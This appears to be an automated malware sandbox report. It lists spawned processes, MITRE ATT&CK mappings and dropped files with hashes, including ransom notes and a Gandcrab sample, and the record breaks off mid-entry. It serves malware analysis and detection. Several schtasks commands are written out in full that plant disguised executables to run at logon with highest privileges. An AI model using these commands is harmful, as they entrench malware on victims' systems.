schtasks.exe /create /tn "2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "kosomk" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\kosomk.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5148

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c27" /sc MINUTE /mo 5 /tr "'C:\Windows\Containers\serviced\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c2" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2" /sc ONLOGON /tr "'C:\Windows\Containers\serviced\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:7808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:7248

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "kosomkk" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Defender\kosomk.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:7176

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c27" /sc MINUTE /mo 9 /tr "'C:\Windows\Containers\serviced\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6900

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
PID:7776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae935535" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:8024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Portable Devices\firefox.exe'" /f
1⤵
PID:8048

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefox" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\firefox.exe'" /rl HIGHEST /f
1⤵
PID:8052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae93553" /sc ONLOGON /tr "'C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6284

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\firefox.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:2772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Portable Devices\firefox.exe'" /rl HIGHEST /f
1⤵
PID:7480

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\firefox.exe'" /f
1⤵
PID:7364

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefox" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\firefox.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:5704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefox" /sc ONLOGON /tr "'C:\Users\Admin\firefox.exe'" /rl HIGHEST /f
1⤵
PID:8056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae935535" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:7940

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\firefox.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\firefox.exe'" /rl HIGHEST /f
1⤵
PID:7324

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad472193" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:7848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad472193" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:2228

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:1108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 10 /tr "'C:\Program Files\dotnet\firefox.exe'" /f
1⤵
PID:1648

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefox" /sc ONLOGON /tr "'C:\Program Files\dotnet\firefox.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:1360

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 12 /tr "'C:\Program Files\dotnet\firefox.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:5256

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:3096

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7324

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7468

C:\Windows\SysWOW64\wowmgr.exe
C:\Windows\SysWOW64\wowmgr.exe
1⤵
PID:5704

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:7532

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
PID:2812

C:\Windows\system32\verclsid.exe
"C:\Windows\system32\verclsid.exe" /S /C {B4BFCC3A-DB2C-424C-B029-7FE99A87C641} /I {000214E6-0000-0000-C000-000000000046} /X 0x401
1⤵
- System Binary Proxy Execution: Verclsid
PID:7084

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Scripting

T1064

Windows Management Instrumentation

T1047

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Scripting

T1064

System Binary Proxy Execution

T1218

Verclsid

T1218.012

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\S-1-5-21-2412658365-3084825385-3340777666-1000\WYCTFAL-DECRYPT.txt

Filesize
8KB

MD5
a0e78e1da3a6f6f9fa4ea70b8a13405d

SHA1
8b75df956bc496b9d8e8d968d91d8c19c3e72d5e

SHA256
f1021dab5d462c97a974d15ead12d8d5261385a031aa444f40cde3fead612846

SHA512
ff43786e6e3be26aeb9f6ccb6402cb100c3b99864d64cd0e1a7aa6c1d580bd2b8d8e33c991dbe6a015b645132e9d8eb84120e8fe3cdcfebf5b231dcb6d23e640

Download Submit
C:\PerfLogs\WYCTFAL-DECRYPT.txt

Filesize
8KB

MD5
66392840c2720680b892109aa5e792a9

SHA1
10e210e301700f0f5794a5124e2bdce3a94aacea

SHA256
08e71888777a5cb5f38896c2f48066edabaf7967558e5118d7f5d34030b8d070

SHA512
8bc35776f1f6e8c2d368d6b289815350ba36a44f8c06bab0594c5493465f1188a9462476bcc2b4f6e80d38890e28a6b21942ea92bd8b782aa3077364e0d66fc8

Download Submit
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe

Filesize
233KB

MD5
4ef3177a2e94ce3d15ae9490a73a2212

SHA1
a34f47568ce7fcea97a002eebeae385efa98790c

SHA256
87353d18dfdebf4d0747bbf21d58adaed2b04060d61cba3fa052d522640520f0

SHA512
635ce5c0d1b9f7dd5d7b4c00f216af06dc7d818132ba87a57d3d54f6b30ee01f64430d2aa265f60027cc58dc2e738d5b674ee36ffdca34ff540ce44b7da7c502

Download Submit
C:\Program Files (x86)\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe

Filesize
55KB

MD5
17315d95e80eb36cc51a7d25e4c8b231

SHA1
95006ad8de0a17dc3df6698e195e62b8ee32475e

SHA256
2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c

SHA512
481a15c46dcf38562aa989f52330e556da90a3ce00190cedb2e00b2a39df5db3bcc3af743060fd8c75933d6ae756aa4bbc176708f36d3b4aa443b4663ca94608

Download Submit
C:\Program Files (x86)\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe

Filesize
37KB

MD5
5c8eb40a1344bd8b18c1ef0d95d433d4

SHA1
b6c1f037637936ae018cc5e3e17ab9f3cc8cb3ff

SHA256
31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65

SHA512
74aa4c3047e5fff0b0d903841ceb01cd0e9939244c9008a9ae6a77ee5484290e7a0df56bbfc422ff5cf80012e84b75af2cf8840fd6ce6c80ea361fa07e5da577

Download Submit
C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe

Filesize
93KB

MD5
7299c8fe0d2e5c385c4e4711260ee2b5

SHA1
4814f8494c3ff005203838e25a62cdb1ce5f8d68

SHA256
34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219

SHA512
2103b6e574657998159979c0d1e9021175732fffbfcba4ac1c3f778b33010129b9b9467b6f6a1e5f4095e9bf62d2212654f20c5a051cbb72158a2a8f399dfaad

Download Submit
C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe

Filesize
3.2MB

MD5
57ccb6f0bd910fed428761828ae93553

SHA1
71dfe6354ac308d03cf7219686358652b9a8d438

SHA256
7d357b523b5116915747af1fb0d5e6b20a472dd08fd4eda3d0733aeaf70dcd07

SHA512
44423e3df0d34d8917c82103f336cf0c61cd0aa2e3722e3baf9224daf0b620009967136b1625d2f783b1e36207ac529008d49235ae2ae50b01a9b053d0ba0878

Download Submit
C:\Program Files (x86)\5e710462c65fe899466e4fb7c1e33c9a.exe

Filesize
828KB

MD5
5e710462c65fe899466e4fb7c1e33c9a

SHA1
a0bee34a8865683de35502c1ed5ff41e86670718

SHA256
f4f54ed5ec3a6e3b427be418fa0f63061e2feffbb9c33ab3911404b1b8f93c7e

SHA512
35c4adede7a4f8baad61876de8821e91dfe4ace4ec721575fc8155f6e7d43c794a7d4741609fda24b16a82d3d9ae18bc35addb299416f59ad1cde74eedbfa0c2

Download Submit
C:\Program Files (x86)\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe

Filesize
568KB

MD5
4448a3c2ddfdda45009b440faa39a5fe

SHA1
b16a26331d6ebe8f4a45b43e8b0251a715139b10

SHA256
70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2

SHA512
094cef6184c29430be5e4536b54cdfa632b52e7e09c7a4c04104d1b533113f6de6190d6525aac84ddba631220ee0b33a047272b952765977df336a5fa72425b0

Download Submit
C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe

Filesize
827KB

MD5
73c1c41b9e71c48e752a5cd19fe808b6

SHA1
b8bd41a0b9dc7baef6eb01dfe6c852afdfaeed18

SHA256
fce441edb227275c5380194cc7a96a95998de6d75cd601b73bce1be529a68bd6

SHA512
f146a8917d39aa29d52386f5a23bbc01fbfade291d576782b5cc80b0ca363fa24fee80f00cf81ffa40e12503fedd203b422b7ad97dbb0d4500152e86d974cb38

Download Submit
C:\Program Files (x86)\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe

Filesize
268KB

MD5
fc57a660e24d9c91cb5464b2ece30756

SHA1
6d70e4dcd68ea6dae43cc381d4be84bcfad38eda

SHA256
75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa

SHA512
8f0fa0a2e5553a4059ac3e224ea8106131193f3cec7c23456507f8404c42440267efe88462cf31bcd3a6f9dba57011933a2a43e74b1cccd5d1a363497d1a3a67

Download Submit
C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe

Filesize
205KB

MD5
887b35a87fb75e2d889694143e3c9014

SHA1
c8be4500127bfce10ab38152a8a5003b75613603

SHA256
78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae

SHA512
98cf0e201092e6d43a7ec5db4d80e6cc20ec9a983098b04597039b244535f78a4096b76bc62e591336b810fafa302e1009a64be6e788f24dcc8b3ac0c8eb930a

Download Submit
C:\Program Files (x86)\7f1630df6b57af024a3b561bdadc208f.exe

Filesize
175KB

MD5
7f1630df6b57af024a3b561bdadc208f

SHA1
9b304cb2eff05f040b76eccc00ee55b914cf1839

SHA256
c9dbac4fe659e8918f50a4a157713e40d71e05367799af66d1d7845d958ee3f7

SHA512
742219cb5c76b9d39ed56cff988a533d19ef3e202e0fa48e9a3aed7dd9de190eef0c313bc974e37e7f363892eb6787bc66657324be2f0fb05d1b0021ae61ec9e

Download Submit
C:\Program Files (x86)\938b92958ded4d50a357d22eddf141ad.exe

Filesize
308KB

MD5
938b92958ded4d50a357d22eddf141ad

SHA1
062f16b1cdfacc55f982908ee6c85fce6296805a

SHA256
93c8db29ec3707f13bf5a96d5b8a3dc33c2f5b870acd3df07292c724ce10a13f

SHA512
372942601188751cdbb79cc94469a66434ca2963591bb849137654622485cd92f4ac8fbbc9b83c3acdc128e354bb3b805af0fc0a465e0a2519d330f8ca9a6c36

Download Submit
C:\Program Files (x86)\BTZ.exe

Filesize
73KB

MD5
cff0392ac2a1d782f43f7938ea18af4f

SHA1
1dfd93a3106a1b4fd10cfaf8b8bb4bb606c4093d

SHA256
ecfed4163f7058856e1d253a29d06d808c069670e4a06cad66f42e71cbc83a2e

SHA512
134f6c8343bbcce6e23ae370193aa1b415f337790e13b2cd6171e657c775c7971a7b13146d930b5273b0ea64ee947df1cc5467e4dd52900d70f13550c6b9ae8b

Download Submit
C:\Program Files (x86)\Cat.exe

Filesize
2.1MB

MD5
fadadf302e5b6c4010d700a3802ac678

SHA1
6548d465ae4facaa1d2d1921e423a7b871bcf36b

SHA256
d61f36d7dc8cc8464434ee6fa72fec2d1e210978769d1443db08f1decd845f67

SHA512
571db891718f1cc7e260772054ec39592259fdb3238dab90071a8ab7eeddc5baf2de2719f12f246a4a0466da7b72776a49f51da124afff936cd78f4253b5646b

Download Submit
C:\Program Files (x86)\Client.exe

Filesize
100KB

MD5
21560cb75b809cf46626556cd5fbe3ab

SHA1
f2eec01d42a301c3caacd41cddb0ef2284dbb5a6

SHA256
d2525bab5cb322933c8978880975e0c189feece68ae3f1951bf46297c7f640fa

SHA512
21eac0037b16f968ee8743b52dc73efdd34d24c2502d090b399a552dc6cb75f7d3090c10d448c66b868b1c4a7c46a5068b084b88b487e40b1e755356cb7557db

Download Submit
C:\Program Files (x86)\Darkest Dungeon setub.exe

Filesize
284KB

MD5
382c21837fbb296675b92c64bbc6249d

SHA1
ddedd90110497139ee0b5fca0e8ea3b585271f6d

SHA256
6ba1d9cf4b63033c0d9752fbe663eee726a5cf5401b20b8b8e927cca39cf113d

SHA512
3a7cc906a9bc94526b0f0fbaff43fa6230e14d0226439d1558b1e09d258911beb79fbfdb56c9286373856dca958dd5decb10c42e7248763dde1e1e85a3aae727

Download Submit
C:\Program Files (x86)\Gandcrab5.0.3.exe

Filesize
424KB

MD5
95557a29de4b70a25ce62a03472be684

SHA1
5baabf2869278e60d4c4f236b832bffddd6cf969

SHA256
49b769536224f160b6087dc866edf6445531c6136ab76b9d5079ce622b043200

SHA512
79b78cf77926e0d8b424ad9984f72d4461c7d9e7af58c4e2af32fa7c58cc445c534228b0709b87f5e35e1c8793b3d028dc60787151d852b8524023d08b57f103

Download Submit
C:\Program Files (x86)\Happy18.exe

Filesize
9KB

MD5
8c0ec9b7f903dce401ac301fbf43e930

SHA1
46db7e2a37d95eb1265b30c1557a5e80683b48f1

SHA256
ddd60301114f7867605a31a6d7c4c2014fe28bd4e0edfc53024a22d10b7bf3f8

SHA512
5dc630f669ae4ddb6cbe6b6f276d63aaf9f55de964990b4a2a57830bd0fd1127a2ee729bc099b738e813c6e0b23a29c3d73b39bb6055372867eb1dcc57635ae5

Download Submit
C:\Program Files (x86)\LightNeuronX0.exe

Filesize
14KB

MD5
55319464e46e2c31d22b39b46d5477fb

SHA1
a4d1a34fe5effd90ccb6897679586ddc07fbc5cd

SHA256
14f530e16e8c6dbac02f1bde53594f01b7edab9c45c4c371a3093120276ffaf1

SHA512
3a3ad3aa4bf745932d8ea02f3c96774aada2d1d1723be1ceb6cd5b7823e3d0f4e91457dbeebe92c8a2c8e7bdc1134b3b59bb9d9ce7503aeae6c182894203c9a3

Download Submit
C:\Program Files (x86)\TEST.exe

Filesize
37KB

MD5
ca70b79092c1b1e6dc8eb7950864b0ee

SHA1
3396cebc62c348fc96463a73a40eb4e5e6bc09c5

SHA256
2ce66bab757ad6cbee699be5ad711582d837f3e0b216d70cdb933c4c9415b20b

SHA512
9eb6c13096de168c46d8c2dd78ce28a19dd4f0aadded4fcf6b9ed655faac43747f7eb7123f664c8e44d77aaf1c6948ec6072a9d63b98ec69e104a7bbb97ebe34

Download Submit
C:\Program Files (x86)\a6a1abaf12a28ea8f6553356c3bdcf57.exe

Filesize
874KB

MD5
a6a1abaf12a28ea8f6553356c3bdcf57

SHA1
b7613fb9944bc3d8e11b5eb6f7ff706f04e8ad53

SHA256
f2507211585dfe351ff53086f30b42572db223b2646e45f91b7f3e202bb0bb76

SHA512
e525d119128c1ca1c05d379b9ebba9791b7b15390c8999773bff6517fde674178e17ee2c7c126b249c8c54b4dd1c07326ba24d52c8c192f067bc7e8545113a65

Download Submit
C:\Program Files (x86)\evil.exe

Filesize
23KB

MD5
0e0d73422110762ad112c39647865d09

SHA1
4bb94e94e65a8bc12313783df99b96d89d7fd764

SHA256
02ac6f6f2eff68b25be9ec044a2af027fbc915af3053f647086f68ad8d6c2e30

SHA512
e31a21c42c7bcdeb8dd80418fad12d5dc8486e21b609f5636114021fbcadb989ca7a612c0300ebb235c5f7a167a60541125409bd959442116407f48808742607

Download Submit
C:\Program Files (x86)\fwclt.exe

Filesize
1024B

MD5
c98a0d1909d8fad4110c8f35ee6f8391

SHA1
3c2b7bb0f3c8ca829602e4182a816a0905398521

SHA256
0f5ec3b9535d4f956330351c5310626ffaa17f146ff51a8b3b10ea0a7039eadc

SHA512
d3760b816b2a3fc3ec4f3ed9eee869885943d95d8a18f8a8233bc3e1b0f774dc9f55b518a54bcac3f94b2d960a73e53987fc09fa338c5b56d20e042610c0d948

Download Submit
C:\Program Files (x86)\kosomk.exe

Filesize
23KB

MD5
926e2c78bcea51e5309db037b18b4202

SHA1
d4b80f95bfdc9c2ff860ac0cc2012a81b425801d

SHA256
1d74f423f423175189fbe07b34697cae04d6d48181efbed5c3b790a137145f10

SHA512
6962876b91bcf7d40d9250dde094ce560f3b3c7a4766ac5e810d27de46cd4167937042d5ae94b21f21a1b19dc4c39dc0107e2aac1fbcd17680345f2fe06354a1

Download Submit
C:\Program Files (x86)\malecus.exe

Filesize
15KB

MD5
0e741eb3f92a7a739628d04a5fd4aab9

SHA1
87a8865773a791ab3ca68201cee7a0c3fef2fab3

SHA256
1ef41bb945daf62e1a7098b1f9b684e54cb1ac5fbbadf1f49e5a87b1788b9f85

SHA512
1377611e60d25eb456f5d5c911fe16c7d655b7930a8475e7d164d0c536740d286c7c27bcedd191c266c3085f6570892a975fddaee9a9ab3ca4b598b53350283c

Download Submit
C:\Program Files (x86)\see7.exe

Filesize
574KB

MD5
1ccf28645e2d52556487a9710de54d8e

SHA1
e83b5b14a3d08d8838e23c08070ebec713f859ef

SHA256
513624286483a4e172511b412b82445a06eefc904d54de75da656ec1a6f8ae99

SHA512
5a5f4c5fb992bac2119234563a8a7d3418baab3e3519f936f13a598aa9026dbeba571b7981a5a6afa519e18b124d8cf4c6642b30b88a4a091a051e2b41c5f321

Download Submit
C:\Program Files (x86)\vbc.exe

Filesize
123KB

MD5
d2ce3b2a5f3efb1fcede96304e57a531

SHA1
d74be8fe0be4ec13340dad9c0fdeb653c9c8b90e

SHA256
e0a4948a58829f4ecd9e6fb9b28e127a6827bd8761ded085d2069a248f6f5462

SHA512
fd0d0b51000b146049db24ecac27885ff4f688b4e40b42061972d21aaa45f8657437db8f56880f5414f00b5e35febce8a339b1d30bd387f8f11a179b222e828b

Download Submit
C:\Program Files (x86)\virus.jk.exe

Filesize
2.0MB

MD5
e0d346913cbf16602edf1aceda2a62b1

SHA1
2387b499cba2684ab293a758413ea2a5f150fa45

SHA256
c1bc3d85a9f78eea49adfb80669570c0cd6cd3dda92223496182e3aadf4e0b30

SHA512
a2c9a2708b4e0a32ab10bd29428ad2583382a5bb56dc6641ae07144d8707efd963004d1a5e71a9c8b9c53e09629b60b9ef7e6a16366ee376083937e717c1977f

Download Submit
C:\Program Files\7-Zip\Lang\YOUR_FILES_ARE_DEAD.HTA

Filesize
64KB

MD5
288387baefa9d0b5c3a02cd3667c3551

SHA1
aa599054393bf44d043fc000e5ec8891008c0e32

SHA256
bae4b2d8a428a4846f5aafe1af1b9d18d3119fdca18b8ccdd09bef9c47ee82af

SHA512
0900d54a4e145379cf9e013f37b673c5d061213cd115a36e76ba3acbadbb74ab5c35d326e9a92554b7d1919fd0cb4a5256f255b0524af1605076dea3fba56978

Download Submit
C:\Users\Admin\AppData\Local\7775588d887cfecbeb1495246767d24e\Admin@HVDPCYGS_en-US\Browsers\Firefox\Bookmarks.txt

Filesize
105B

MD5
2e9d094dda5cdc3ce6519f75943a4ff4

SHA1
5d989b4ac8b699781681fe75ed9ef98191a5096c

SHA256
c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

SHA512
d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2783c40400a8912a79cfd383da731086

SHA1
001a131fe399c30973089e18358818090ca81789

SHA256
331fa67da5f67bbb42794c3aeab8f7819f35347460ffb352ccc914e0373a22c5

SHA512
b7c7d3aa966ad39a86aae02479649d74dcbf29d9cb3a7ff8b9b2354ea60704da55f5c0df803fd0a7191170a8e72fdd5eacfa1a739d7a74e390a7b74bdced1685

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ff63763eedb406987ced076e36ec9acf

SHA1
16365aa97cd1a115412f8ae436d5d4e9be5f7b5d

SHA256
8f460e8b7a67f0c65b7248961a7c71146c9e7a19772b193972b486dbf05b8e4c

SHA512
ce90336169c8b2de249d4faea2519bf7c3df48ae9d77cdf471dd5dbd8e8542d47d9348080a098074aa63c255890850ee3b80ddb8eef8384919fdca3bb9371d9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
192B

MD5
7ee9ebec0da58a5c04fde57bf22b3af9

SHA1
7112e921f3da97ff2e76f2e1c6f15f5dbe512287

SHA256
ce285a2e8c3d3a34ab72e1363e42498af1c1882c269142fb85b566f7e5b1493f

SHA512
d47dc13036a183779cec71854da293978f76de4104026a61b6daf6601fc7203fa7c031c83f4d4fced4d70bfd1a969c706af7d2994bd0fc772f89135e67fccf9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
d9475a0cae9dad37b11446267db6216c

SHA1
18d12ec019be95b1624655586e4e9cfee4341a4d

SHA256
2dc57302c317bb8314eda015ed0afa10fb47c63447b9e9e41fc7c9c99c8c2f27

SHA512
3e82c8213ca0aa6ad2ebe2e308a25164b720b4a3e8ef081627bec9ea01490776fa44f864bbabb2e3cb4c8213668144ae31931eeff162f7a62bbcbc53c7bd283d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
78ef85bc0686dc4ee6313bd7b43e9c11

SHA1
0986f6b281a43d715a08c757b46333f0119f98ec

SHA256
5930ae6358d4329029ecf1c01ac4152c83289cc410a324c5967d8793bcbd8b2c

SHA512
dd103e629aaa3e1a7a38e2661161ef80006a3b80f040b0e27bf0cbb173c6c01e3fd042d6d37c0621038ebff4144939a9a86de2593eca6adf16a638f3ca2f8fba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
807419ca9a4734feaf8d8563a003b048

SHA1
a723c7d60a65886ffa068711f1e900ccc85922a6

SHA256
aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631

SHA512
f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
fcd24d56136f37b47e8a281376ee13a3

SHA1
22a5a519d82afc0f818b7d6560b6741c24846ba9

SHA256
cc95e8234ac95026a274ef3bd65675b677bce01854c25db885382c5847fc3a29

SHA512
4636f9664e5386b02a0725ba6b116634b859903174412bb57a14163874644228f8269686314e5a81abab55454e5d8f79a1c24d3cf2ef876b4a580fc887037293

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
2379d4bcd7f19bfd032ca412321f3964

SHA1
91ec00476ec9b4d53da76967b5b9a5f6fa13c594

SHA256
bb3160c72ac7b6676214dfc9101c59cf106b68200b37c02e43459edbc18b8b0d

SHA512
e75839236a4d6ae03e0d98854e42270382c987c0db6673d5e020908db440b89824623a8869c84d50d73ada1c0c4ea4ba1e1c179d8b23e4d71ad34554b870a5ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
204B

MD5
aa5a99ecf229bfbf9f9d64840eb50f13

SHA1
b3114bf93168a09c707781a298160298e7a4a883

SHA256
